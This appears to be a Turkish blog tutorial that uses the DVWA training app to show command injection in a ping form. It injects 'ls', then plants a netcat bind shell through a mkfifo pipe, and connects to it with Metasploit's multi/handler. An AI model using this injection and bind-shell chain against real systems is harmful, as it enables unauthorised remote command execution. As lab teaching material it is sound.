Command Excution Zaafiyeti


Cümleten Selamün Aleyküm bugün sizlere Command Execution Zaafiyetinin ne olduğundan ve bu zaafiyete sahip bir panele nasıl bind shell atıp kullanılır ondan bahsedeceğim.

Not:Alıntılar içeren yazım özgünleştirilmiştir.

Command Execution Nedir?

Bu zaafiyet komut isteyen panellerde bulunur. Bu panelde istediğimiz komutları yazabiliriz. Çok tehlikeli bir zaafiyettir.

Arkadaşlar ben bu konuyu DVWA üzerinden anlatacağım bu yüzden DVWA'ya girdikten sonra sol kısımdan "Command Execution" kısmına tıklıyorum. Ve ilk önce ping atıcının çalışıp çalışmadığını kontrol ediyorum.



Şimdi ise ping atıcının başka komutlar çalıştırıp çalışmadığını kontrol ediyorum. Bunun için IP adresinin yanına
Kod: [Seç]
&& ls
komutunu yazıyorum. Ve kodun çalıştığını görüyorum. Yani bu panelin bağlı olan sistemine bazı komutları çalıştırabiliriz.



Şimdi bu sisteme bir bind shell yerleştirelim. Yani bu sistemi kendi komut satırımızdan yönetelim. Bunun için vereceğim komutu yazın. Ama elinizle yazmanız daha iyi olur.
Kod: [Seç]
192.168.1.1;mkfifo /tmp/pipe;sh /tmp/pipe | nc -l -p 4445 > /tmp/pipe
Bu komutla panele bind shellimizi yerleştiriyoruz. Sayfa tekrardan yüklenmeyecektir buna aldırmayın.



Şimdi bind shellimize bağlanmak için komut satırımızı açalım ve "Metasploit"'e giriş yapmak için komut satırımıza
Kod: [Seç]
msfconsole
komutunu yazalım.
Kod: [Seç]
use exploit/multi/handler
komutunu yazalım ardından
Kod: [Seç]
set payload linux/x86/shell/bind_tcp
komutunu yazarak payloadımızı ayarlayalım.


Kod: [Seç]
show options
komutunu yazarak yapabileceğimiz ayarlara bakalım
Kod: [Seç]
set LPORT 4445
komutunu yazarak panelde oluşturduğumuz port değerimizi giriyoruz.


Kod: [Seç]
set RHOST ipadresiniz
bu komutla da IP adresimizi ayarlıyoruz. Ip adresinizi de yeni bir komut satırı açıp
Kod: [Seç]
ifconfig
komutunu yazarak öğrenebilirsiniz.




Kod: [Seç]
exploit -j
komutunu yazarak bind shellimizi dinlemeye başlayalım.


Kod: [Seç]
sessions -i 1
komutunu yazarak bind shellimizi kullanmaya başlayalım. Bu kadar. Şimdi bazı komutları bu sistem üzerinde uygulayabilirsiniz.



Allah'a emanet..

Yorumlar

Yorum Gönder

Popüler Yayınlar